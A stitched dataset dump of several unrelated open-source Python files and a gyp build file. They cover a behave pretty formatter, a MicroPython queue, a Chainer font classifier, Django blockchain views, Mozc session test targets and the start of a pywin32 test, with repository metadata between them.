import termios
import struct
zero_struct = struct.pack("HHHH", 0, 0, 0, 0)
result = fcntl.ioctl(0, termios.TIOCGWINSZ, zero_struct)
h, w, hp1, wp1 = struct.unpack("HHHH", result)
return w or DEFAULT_WIDTH, h or DEFAULT_HEIGHT
except Exception: # pylint: disable=broad-except
return (DEFAULT_WIDTH, DEFAULT_HEIGHT)
# -----------------------------------------------------------------------------
# COLORING SUPPORT:
# -----------------------------------------------------------------------------
class MonochromeFormat(object):
def text(self, text): # pylint: disable=no-self-use
assert isinstance(text, six.text_type)
return text
class ColorFormat(object):
def __init__(self, status):
self.status = status
def text(self, text):
assert isinstance(text, six.text_type)
return escapes[self.status] + text + escapes["reset"]
# -----------------------------------------------------------------------------
# CLASS: PrettyFormatter
# -----------------------------------------------------------------------------
class PrettyFormatter(Formatter):
# pylint: disable=too-many-instance-attributes
name = "pretty"
description = "Standard colourised pretty formatter"
def __init__(self, stream_opener, config):
super(PrettyFormatter, self).__init__(stream_opener, config)
# -- ENSURE: Output stream is open.
self.stream = self.open()
isatty = getattr(self.stream, "isatty", lambda: True)
stream_supports_colors = isatty()
self.monochrome = not config.color or not stream_supports_colors
self.show_source = config.show_source
self.show_timings = config.show_timings
self.show_multiline = config.show_multiline
self.formats = None
self.display_width = get_terminal_size()[0]
# -- UNUSED: self.tag_statement = None
self.steps = []
self._uri = None
self._match = None
self.statement = None
self.indentations = []
self.step_lines = 0
def reset(self):
# -- UNUSED: self.tag_statement = None
self.current_rule = None
self.steps = []
self._uri = None
self._match = None
self.statement = None
self.indentations = []
self.step_lines = 0
def uri(self, uri):
self.reset()
self._uri = uri
def feature(self, feature):
#self.print_comments(feature.comments, '')
self.current_rule = None
prefix = ""
self.print_tags(feature.tags, prefix)
self.stream.write(u"%s: %s" % (feature.keyword, feature.name))
if self.show_source:
# pylint: disable=redefined-builtin
format = self.format("comments")
self.stream.write(format.text(u" # %s" % feature.location))
self.stream.write("\n")
self.print_description(feature.description, " ", False)
self.stream.flush()
def rule(self, rule):
self.replay()
self.current_rule = rule
self.statement = rule
def background(self, background):
self.replay()
self.statement = background
def scenario(self, scenario):
self.replay()
self.statement = scenario
def replay(self):
self.print_statement()
self.print_steps()
self.stream.flush()
def step(self, step):
self.steps.append(step)
def match(self, match):
self._match = match
self.print_statement()
self.print_step(Status.executing, self._match.arguments,
self._match.location, self.monochrome)
self.stream.flush()
def result(self, step):
if not self.monochrome:
lines = self.step_lines + 1
if self.show_multiline:
if step.table:
lines += len(step.table.rows) + 1
if step.text:
lines += len(step.text.splitlines()) + 2
self.stream.write(up(lines))
arguments = []
location = None
if self._match:
arguments = self._match.arguments
location = self._match.location
self.print_step(step.status, arguments, location, True)
if step.error_message:
self.stream.write(indent(step.error_message.strip(), u" "))
self.stream.write("\n\n")
self.stream.flush()
def arg_format(self, key):
return self.format(key + "_arg")
def format(self, key):
if self.monochrome:
if self.formats is None:
self.formats = MonochromeFormat()
return self.formats
# -- OTHERWISE:
if self.formats is None:
self.formats = {}
# pylint: disable=redefined-builtin
format = self.formats.get(key, None)
if format is not None:
return format
format = self.formats[key] = ColorFormat(key)
return format
def eof(self):
self.replay()
self.stream.write("\n")
self.stream.flush()
def table(self, table):
prefix = u" "
if self.current_rule:
prefix += u" "
cell_lengths = []
all_rows = [table.headings] + table.rows
for row in all_rows:
lengths = [len(escape_cell(c)) for c in row]
cell_lengths.append(lengths)
max_lengths = []
for col in range(0, len(cell_lengths[0])):
max_lengths.append(max([c[col] for c in cell_lengths]))
for i, row in enumerate(all_rows):
#for comment in row.comments:
# self.stream.write(" %s\n" % comment.value)
self.stream.write(u"%s|" % prefix)
for j, (cell, max_length) in enumerate(zip(row, max_lengths)):
self.stream.write(" ")
self.stream.write(self.color(cell, None, j))
self.stream.write(" " * (max_length - cell_lengths[i][j]))
self.stream.write(" |")
self.stream.write("\n")
self.stream.flush()
def doc_string(self, doc_string):
#self.stream.write(' """' + doc_string.content_type + '\n')
doc_string = _text(doc_string)
prefix = u" "
if self.current_rule:
prefix += u" "
self.stream.write(u'%s"""\n' % prefix)
doc_string = escape_triple_quotes(indent(doc_string, prefix))
self.stream.write(doc_string)
self.stream.write(u'\n%s"""\n' % prefix)
self.stream.flush()
# def doc_string(self, doc_string):
# from behave.model_describe import ModelDescriptor
# prefix = " "
# text = ModelDescriptor.describe_docstring(doc_string, prefix)
# self.stream.write(text)
# self.stream.flush()
# -- UNUSED:
# def exception(self, exception):
# exception_text = _text(exception)
# self.stream.write(self.format("failed").text(exception_text) + "\n")
# self.stream.flush()
def color(self, cell, statuses, _color): # pylint: disable=no-self-use
if statuses:
return escapes["color"] + escapes["reset"]
# -- OTHERWISE:
return escape_cell(cell)
def indented_text(self, text, proceed):
if not text:
return u""
if proceed:
indentation = self.indentations.pop(0)
else:
indentation = self.indentations[0]
indentation = u" " * indentation
return u"%s # %s" % (indentation, text)
def calculate_location_indentations(self):
line_widths = []
for s in [self.statement] + self.steps:
string = s.keyword + " " + s.name
line_widths.append(len(string))
max_line_width = max(line_widths)
self.indentations = [max_line_width - width for width in line_widths]
def print_statement(self):
if self.statement is None:
return
prefix = u" "
if self.current_rule and self.statement.type != "rule":
prefix += prefix
self.calculate_location_indentations()
self.stream.write(u"\n")
#self.print_comments(self.statement.comments, " ")
if hasattr(self.statement, "tags"):
self.print_tags(self.statement.tags, prefix)
self.stream.write(u"%s%s: %s " % (prefix, self.statement.keyword,
self.statement.name))
location = self.indented_text(six.text_type(self.statement.location), True)
if self.show_source:
self.stream.write(self.format("comments").text(location))
self.stream.write("\n")
#self.print_description(self.statement.description, u" ")
self.statement = None
def print_steps(self):
while self.steps:
self.print_step(Status.skipped, [], None, True)
def print_step(self, status, arguments, location, proceed):
if proceed:
step = self.steps.pop(0)
else:
step = self.steps[0]
text_format = self.format(status.name)
arg_format = self.arg_format(status.name)
prefix = u" "
if self.current_rule:
prefix += u" "
#self.print_comments(step.comments, " ")
self.stream.write(prefix)
self.stream.write(text_format.text(step.keyword + " "))
line_length = 5 + len(step.keyword)
step_name = six.text_type(step.name)
text_start = 0
for arg in arguments:
if arg.end <= text_start:
# -- SKIP-OVER: Optional and nested regexp args
# - Optional regexp args (unmatched: None).
# - Nested regexp args that are already processed.
continue
# -- VALID, MATCHED ARGUMENT:
assert arg.original is not None
text = step_name[text_start:arg.start]
self.stream.write(text_format.text(text))
line_length += len(text)
self.stream.write(arg_format.text(arg.original))
line_length += len(arg.original)
text_start = arg.end
if text_start != len(step_name):
text = step_name[text_start:]
self.stream.write(text_format.text(text))
line_length += (len(text))
if self.show_source:
location = six.text_type(location)
if self.show_timings and status in (Status.passed, Status.failed):
location += " %0.3fs" % step.duration
location = self.indented_text(location, proceed)
self.stream.write(self.format("comments").text(location))
line_length += len(location)
elif self.show_timings and status in (Status.passed, Status.failed):
timing = "%0.3fs" % step.duration
timing = self.indented_text(timing, proceed)
self.stream.write(self.format("comments").text(timing))
line_length += len(timing)
self.stream.write("\n")
self.step_lines = int((line_length - 1) / self.display_width)
if self.show_multiline:
if step.text:
self.doc_string(step.text)
if step.table:
self.table(step.table)
def print_tags(self, tags, indentation):
if not tags:
return
line = " ".join("@" + tag for tag in tags)
self.stream.write(indentation + line + "\n")
def print_comments(self, comments, indentation):
if not comments:
return
self.stream.write(indent([c.value for c in comments], indentation))
self.stream.write("\n")
def print_description(self, description, indentation, newline=True):
if not description:
return
self.stream.write(indent(description, indentation))
if newline:
self.stream.write("\n")
| 34.640751
| 83
| 0.565978
|
794e1e2b6541885954f585ef3260d03ceacd3528
| 1,463
|
py
|
Python
|
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | 1
|
2020-02-17T11:12:51.000Z
|
2020-02-17T11:12:51.000Z
|
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | null | null | null |
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | null | null | null |
from ulock import *
class QueueException(Exception):
pass
class queue():
def __init__(self, maxlen=0):
self._maxlen = maxlen
self._lock = lock()
self._fill = lock(True)
self._queue = []
def __len__(self):
with self._lock:
return len(self._queue)
def put(self, item):
with self._lock:
if self._maxlen != 0 and len(self._queue) >= self._maxlen:
raise QueueException("full")
self._queue.append(item)
if self._fill.locked():
self._fill.release()
# Return head of queue or None if empty
def head(self):
with self._lock:
return self._queue[0] if len(self._queue) != 0 else None
# Return tail of queue or None if empty
def tail(self):
with self._lock:
return self._queue[-1] if len(self._queue) != 0 else None
def get(self, wait=1):
self._lock.acquire()
if wait:
while len(self._queue) == 0:
# Wait for something
self._lock.release()
self._fill.acquire()
self._lock.acquire()
if len(self._queue) != 0:
item = self._queue.pop(0)
found = True
else:
item = None
found = False
self._lock.release()
if wait and not found:
raise QueueException("empty")
return item
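# A small single-threaded usage example(not part of the original module); the
# values are made up, and get(wait=0) returns None on an empty queue.
if __name__ == "__main__":
    q = queue(maxlen=4)
    q.put("first")
    q.put("second")
    print(q.head(), q.tail(), len(q))  # first second 2
    print(q.get())                     # first
    print(q.get())                     # second
    print(q.get(wait=0))               # None(empty, non-blocking)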
| 23.983607
| 70
| 0.524949
|
794e1f68d12d08b12f3a8762577a46adccdd3f4a
| 5,927
|
py
|
Python
|
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import cv2
import chainer
from chainer import cuda
from chainer import optimizers
from chainer import FunctionSet
from chainer import Variable
from chainer import serializers
from chainer import functions as F
from chainer import links as L
from mylib.chainer import dataset
from mylib import tools
import models
def train(train_txt_path, test_txt_path, dst_dir_path, epoch_n=100, batch_size=128, model=models.Classifier_AlexNet()):
'''
    Train the classifier.
    Args:
        train_txt_path: txt file listing the training image paths.
                        Column 1 is the image path, column 2 is the class ID
                        (0, 1, 2, ... in order starting from 'A').
                        ex) /home/hoge/font/A/0.png, 0
                            /home/hoge/font/B/0.png, 1
                            /home/hoge/font/C/0.png, 2
                            /home/hoge/2.png, 0
        test_txt_path: txt file listing the test image paths.
                       Same format as train_txt_path.
        dst_dir_path: output directory for the trained models.
        epoch_n: number of training epochs.
        batch_size: batch size.
        model: Classifier model to train (a class instance from models.py).
'''
train_imgs, train_labels = dataset.filelist_to_list(train_txt_path)
test_imgs, test_labels = dataset.filelist_to_list(test_txt_path)
xp = cuda.cupy
cuda.get_device(0).use()
model.to_gpu()
optimizer = optimizers.SGD(lr=0.01)
optimizer.setup(model)
optimizer.add_hook(chainer.optimizer.WeightDecay(0.0005))
train_imgs_n = train_imgs.shape[0]
test_imgs_n = test_imgs.shape[0]
for epoch_i in range(epoch_n):
print('epoch:{0}/{1}'.format(epoch_i, epoch_n))
perm = np.random.permutation(train_imgs_n)
train_sum_acc = 0
train_sum_loss = 0
test_sum_acc = 0
test_sum_loss = 0
for batch_i in range(0, train_imgs_n, batch_size):
optimizer.zero_grads()
batched_imgs = xp.asarray(train_imgs[perm[batch_i: batch_i + batch_size]])
batched_labels = xp.asarray(train_labels[perm[batch_i: batch_i + batch_size]])
batched_imgs_score = model(Variable(batched_imgs))
loss = F.softmax_cross_entropy(
batched_imgs_score, Variable(batched_labels))
acc = F.accuracy(batched_imgs_score, Variable(batched_labels))
loss.backward()
optimizer.update()
train_sum_loss += float(loss.data.get()) * batch_size
train_sum_acc += float(acc.data.get()) * batch_size
for batch_i in range(0, test_imgs_n, batch_size):
batched_imgs = xp.asarray(test_imgs[batch_i: batch_i + batch_size])
batched_labels = xp.asarray(test_labels[batch_i: batch_i + batch_size])
batched_imgs_score = model(Variable(batched_imgs))
loss = F.softmax_cross_entropy(
batched_imgs_score, Variable(batched_labels))
acc = F.accuracy(batched_imgs_score, Variable(batched_labels))
test_sum_loss += float(loss.data.get()) * batch_size
test_sum_acc += float(acc.data.get()) * batch_size
print('train: loss={0}, accuracy={1}'.format(train_sum_loss / train_imgs_n, train_sum_acc / train_imgs_n))
print('test: loss={0}, accuracy={1}'.format(test_sum_loss / test_imgs_n, test_sum_acc / test_imgs_n))
serializers.save_hdf5('{0}model_{1}.hdf5'.format(dst_dir_path, epoch_i), model)
serializers.save_hdf5('{0}state_{1}.hdf5'.format(dst_dir_path, epoch_i), optimizer)
def classify(src_png_path, classifier):
'''
    Run classification on a single image.
    Args:
        src_png_path: path of the image to classify.
        classifier: Classifier model structure (a class from models.py).
    Return:
        predict_label: predicted label (class ID).
'''
img = cv2.imread(src_png_path, -1)
img = img.astype(np.float32)
img /= 255
img = img[np.newaxis, np.newaxis, :, :]
x = Variable(img)
y = classifier.predictor(x)
max_score = 0
for i, score in enumerate(y.data[0]):
if score > max_score:
max_score = score
predict_label = i
return predict_label
def output_accuracy_rate(img_paths, labels,
model=models.Classifier_AlexNet(),
hdf5_path='/home/abe/dcgan_font/classificator_alex.hdf5'):
'''
    Print the accuracy rate.
    Args:
        img_paths: paths of the target images.
        labels: ground-truth labels of the target images.
        model: Classifier model structure (a class from models.py).
        hdf5_path: path of the trained Classifier model.
'''
serializers.load_hdf5(hdf5_path, model)
classifier = L.Classifier(model)
correct_n = 0
for img_path, label in zip(img_paths, labels):
if label == classify(img_path, classifier):
            print(img_path, 'correct')
correct_n += 1
else:
            print(img_path, 'incorrect')
accuracy_rate = float(correct_n) / float(len(img_paths))
print ('correct_n:', correct_n)
print (accuracy_rate)
def debug():
# # train
# train_txt_path = '/home/abe/font_dataset/png_6628_64x64/train_noise.txt'
# test_txt_path = '/home/abe/font_dataset/png_6628_64x64/test_noise.txt'
# dst_dir_path = tools.make_date_dir('/home/abe/dcgan_font/output_classificator/debug/')
# train(train_txt_path, test_txt_path, dst_dir_path, model=models.Classifier(noise=True))
# classify
# print (classify('/home/abe/font_dataset/png_6628_64x64/B/3239.png'))
# output_accuracy_rate
path_tmp1 = '/home/abe/dcgan_font/output_storage/forPRMU/CNN_Test/plusclassifier/'
img_paths, labels = [], []
for alph in ['A', 'B', 'C', 'D']:
path_tmp2 = path_tmp1 + alph + '_'
for i in range(2500):
img_path = path_tmp2 + str(i) + '.png'
img_paths.append(img_path)
labels.append(ord(alph) - 65)
output_accuracy_rate(img_paths, labels)
if __name__ == '__main__':
debug()
| 36.58642
| 119
| 0.625612
|
794e2015bfe7de13c7e6b0a303f593f02933205d
| 3,980
|
py
|
Python
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 3
|
2021-04-16T21:53:41.000Z
|
2021-05-18T07:28:47.000Z
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 34
|
2018-10-11T17:16:44.000Z
|
2021-09-08T00:31:57.000Z
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 1
|
2019-05-07T20:11:55.000Z
|
2019-05-07T20:11:55.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# Python libs
import json
import logging
# Django packages
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View
# Our Models
from django.conf import settings
from .models import Payload, Block, Transaction
# Blockcypher
from api.views import PayloadSerializer
logger = logging.getLogger('django_info')
class ValidateRxView(View):
''' Validate PoE of one Transaction with a block
poe.received Date of stampd
poe.poe_url Url of PoE
poe.hash Hash of PoE Transaction
poe.data_hex Data Hex
merkle_root Merkle Root of block
'''
template = "blockchain/validate.html"
def get(self, request, *args, **kwargs):
hash_id = kwargs.get("hash_id")
payload = tx = None
template = "blockchain/validate.html"
try:
payload = Payload.objects.get(hash_id=hash_id)
tx = payload.transaction
except Exception as e:
logger.info("[Validate ERROR]:{} type:{}".format(e, type(e)))
# Try to get from transaction ID
try:
tx = Transaction.objects.get(txid=hash_id)
except Exception as e:
_message_error = "[Validate ERROR] Neither hash is from Payload nor Transaction:{} type:{}"
logger.error(_message_error.format(e, type(e)))
return redirect("/")
return render(request, template, {"tx": tx})
def glossary(request):
''' Proof of existence explanation '''
return render(request, "blockchain/glossary.html")
def tx_detail(request, hash_id=False):
''' Get a hash and return the blockchain model '''
if request.GET.get("hash_id", False):
hash_id = request.GET.get("hash_id")
if hash_id:
context = dict()
try:
rx = Payload.objects.get(hash_id=hash_id)
except: # noqa : F841
try:
rx = Payload.objects.get(transaction__txid=hash_id)
except Exception as e:
logger.error("Error :{}, type({})".format(e, type(e)))
return redirect("/block/?block_hash={}".format(hash_id))
_payload = PayloadSerializer(rx)
context.update({
"rx": rx,
"payload": json.dumps(_payload.data, sort_keys=True, indent=4, ensure_ascii=False),
})
return render(request, "blockchain/rx_detail.html", context)
return redirect("/")
def rx_priv_key(request, hash_rx=False):
# Temporary way to show key just for test, remove later
try:
rx = Payload.objects.get(hash_id=hash_rx)
return HttpResponse(rx.get_priv_key, content_type="text/plain")
except Exception as e: # noqa: F841
return HttpResponse("Not Found", content_type="text/plain")
def block_detail(request, block_hash=False):
''' Get a hash and return the block'''
if request.GET.get("block_hash", False):
block_hash = request.GET.get("block_hash")
if block_hash:
context = {}
try:
block = Block.objects.get(hash_block=block_hash)
context["block_object"] = block
if block.poetxid == "True":
context["message_poe"] = "PoE en proceso"
elif block.poetxid == "False" or block.poetxid.strip() == "":
context["message_poe"] = "Sin PoE por el momento"
elif block.poetxid == "Genesis":
context["message_poe"] = "Block Genesis"
else:
# Create URL
context["poe_url"] = "{}/dash/tx/{}/".format(settings.BASE_POE_URL, block.poetxid)
context["message_poe"] = "PoE válida"
return render(request, "blockchain/block_detail.html", context)
except Exception as e:
logger.error("Error found: {}, type: {}".format(e, type(e)))
return redirect("/")
| 33.445378
| 107
| 0.61005
|
794e202247e07930e6dc69151ffef0dc8f934318
| 11,507
|
gyp
|
Python
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 1,144
|
2015-04-23T16:18:45.000Z
|
2022-03-29T19:37:33.000Z
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 291
|
2015-05-04T07:53:37.000Z
|
2022-03-22T00:09:05.000Z
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 301
|
2015-05-03T00:07:18.000Z
|
2022-03-21T10:48:29.000Z
|
# Copyright 2010-2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'relative_dir': 'session',
'gen_out_dir': '<(SHARED_INTERMEDIATE_DIR)/<(relative_dir)',
},
'targets': [
{
'target_name': 'session_handler_test_util',
'type' : 'static_library',
'sources': [
'session_handler_test_util.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../config/config.gyp:config_handler',
'../engine/engine.gyp:engine_factory',
'../engine/engine.gyp:mock_data_engine_factory',
'../protocol/protocol.gyp:commands_proto',
'../protocol/protocol.gyp:config_proto',
'../testing/testing.gyp:testing',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session.gyp:session_handler',
'session.gyp:session_usage_observer',
],
},
{
'target_name': 'session_server_test',
'type': 'executable',
'sources': [
'session_server_test.cc',
],
'dependencies': [
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
'session.gyp:session_server',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_test',
'type': 'executable',
'sources': [
'session_test.cc',
],
'dependencies': [
'../converter/converter_base.gyp:converter_mock',
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../engine/engine.gyp:engine',
'../engine/engine.gyp:mock_converter_engine',
'../engine/engine.gyp:mock_data_engine_factory',
'../rewriter/rewriter.gyp:rewriter',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:mozctest',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_regression_test',
'type': 'executable',
'sources': [
'session_regression_test.cc',
],
'dependencies': [
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../engine/engine.gyp:mock_data_engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
'session.gyp:session_server',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'session_handler_test',
'type': 'executable',
'sources': [
'session_handler_test.cc',
],
'dependencies': [
'../base/base_test.gyp:clock_mock',
'../converter/converter_base.gyp:converter_mock',
'../engine/engine.gyp:mock_converter_engine',
'../testing/testing.gyp:gtest_main',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session.gyp:session_server',
'session_handler_test_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_converter_test',
'type': 'executable',
'sources': [
'session_converter_test.cc',
],
'dependencies': [
'../converter/converter_base.gyp:converter_mock',
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:testing_util',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session_base.gyp:request_test_util',
],
},
{
'target_name': 'session_module_test',
'type': 'executable',
'sources': [
'output_util_test.cc',
'session_observer_handler_test.cc',
'session_usage_observer_test.cc',
'session_usage_stats_util_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../base/base_test.gyp:clock_mock',
'../base/base_test.gyp:scheduler_stub',
'../client/client.gyp:client_mock',
'../config/config.gyp:config_handler',
'../config/config.gyp:stats_config_util',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'../usage_stats/usage_stats_base.gyp:usage_stats',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session_handler',
'session.gyp:session_usage_observer',
'session_base.gyp:keymap',
'session_base.gyp:keymap_factory',
'session_base.gyp:output_util',
'session_base.gyp:session_usage_stats_util',
],
'variables': {
'test_size': 'small',
},
},
{
# iOS is not supported.
'target_name': 'session_watch_dog_test',
'type': 'executable',
'sources': [
'session_watch_dog_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../client/client.gyp:client_mock',
'../testing/testing.gyp:gtest_main',
'session.gyp:session_watch_dog',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_key_handling_test',
'type': 'executable',
'sources': [
'ime_switch_util_test.cc',
'key_info_util_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../config/config.gyp:config_handler',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'session_base.gyp:ime_switch_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_internal_test',
'type': 'executable',
'sources': [
'internal/candidate_list_test.cc',
'internal/ime_context_test.cc',
'internal/keymap_test.cc',
'internal/keymap_factory_test.cc',
'internal/session_output_test.cc',
'internal/key_event_transformer_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../converter/converter_base.gyp:converter_mock',
'../engine/engine.gyp:mock_converter_engine',
'../protocol/protocol.gyp:commands_proto',
'../protocol/protocol.gyp:config_proto',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:testing_util',
'session.gyp:session',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_handler_stress_test',
'type': 'executable',
'sources': [
'session_handler_stress_test.cc'
],
'dependencies': [
'../engine/engine.gyp:engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:random_keyevents_generator',
'session.gyp:session',
'session.gyp:session_handler_tool',
'session.gyp:session_server',
'session_handler_test_util',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'random_keyevents_generator_test',
'type': 'executable',
'sources': [
'random_keyevents_generator_test.cc',
],
'dependencies': [
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'session.gyp:random_keyevents_generator',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'session_converter_stress_test',
'type': 'executable',
'sources': [
'session_converter_stress_test.cc'
],
'dependencies': [
'../engine/engine.gyp:mock_data_engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'request_test_util_test',
'type': 'executable',
'sources': [
'request_test_util_test.cc'
],
'dependencies': [
'../base/base.gyp:base',
'../testing/testing.gyp:gtest_main',
'session_base.gyp:request_test_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_handler_scenario_test',
'type': 'executable',
'sources': [
'session_handler_scenario_test.cc'
],
'dependencies': [
'../base/absl.gyp:absl_status',
'../base/base.gyp:base',
'../data/test/session/scenario/scenario.gyp:install_session_handler_scenario_test_data',
'../data/test/session/scenario/usage_stats/usage_stats.gyp:install_session_handler_usage_stats_scenario_test_data',
'../engine/engine.gyp:mock_data_engine_factory',
'../protocol/protocol.gyp:candidates_proto',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:mozctest',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session_handler',
'session.gyp:session_handler_tool',
'session_base.gyp:request_test_util',
'session_handler_test_util',
],
'variables': {
'test_size': 'large',
},
},
    # Test cases meta target: this target is referenced from gyp/tests.gyp
{
'target_name': 'session_all_test',
'type': 'none',
'dependencies': [
'random_keyevents_generator_test',
'request_test_util_test',
'session_converter_stress_test',
'session_converter_test',
'session_handler_scenario_test',
'session_handler_stress_test',
'session_handler_test',
'session_key_handling_test',
'session_internal_test',
'session_module_test',
'session_regression_test',
'session_server_test',
'session_test',
'session_watch_dog_test',
],
'conditions': [
],
},
],
}
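# Illustrative sketch only (assumed helper, not part of Mozc's build tooling):
# a .gyp file such as the one above is a Python-literal dictionary, so its test
# targets and their 'test_size' variables can be listed with ast.literal_eval.
# The inline GYP_TEXT below is a trimmed, hypothetical stand-in for the real file.
import ast

GYP_TEXT = """
{
  'targets': [
    {
      'target_name': 'session_test',
      'type': 'executable',
      'variables': {'test_size': 'small'},
    },
    {
      'target_name': 'session_regression_test',
      'type': 'executable',
      'variables': {'test_size': 'large'},
    },
  ],
}
"""

def summarize_targets(gyp_text):
    """Yield (target_name, test_size) pairs from a gyp-style literal."""
    data = ast.literal_eval(gyp_text)
    for target in data.get('targets', []):
        size = target.get('variables', {}).get('test_size', 'unspecified')
        yield target['target_name'], size

if __name__ == '__main__':
    for name, size in summarize_targets(GYP_TEXT):
        print(name, size)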
| 32.597734
| 123
| 0.607717
|
794e20d5e43a481ab209b0e7f79b23da36df45c3
| 6,184
|
py
|
Python
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 1,078
|
2016-07-19T02:48:30.000Z
|
2022-03-30T21:22:34.000Z
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 576
|
2017-05-21T12:36:48.000Z
|
2022-03-30T13:47:03.000Z
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 269
|
2017-05-21T04:44:47.000Z
|
2022-03-31T16:18:13.000Z
|
import pythoncom
import win32com.server.util
import time
import win32com, sys, string, win32api, traceback
import win32com.client.dynamic
import win32com.client
import pythoncom
from win32com.axcontrol import axcontrol
from pywintypes import Unicode
from win32com import storagecon
from win32com.test.util import CheckClean
import pywintypes
import win32ui
import win32api, os
S_OK = 0
class LockBytes:
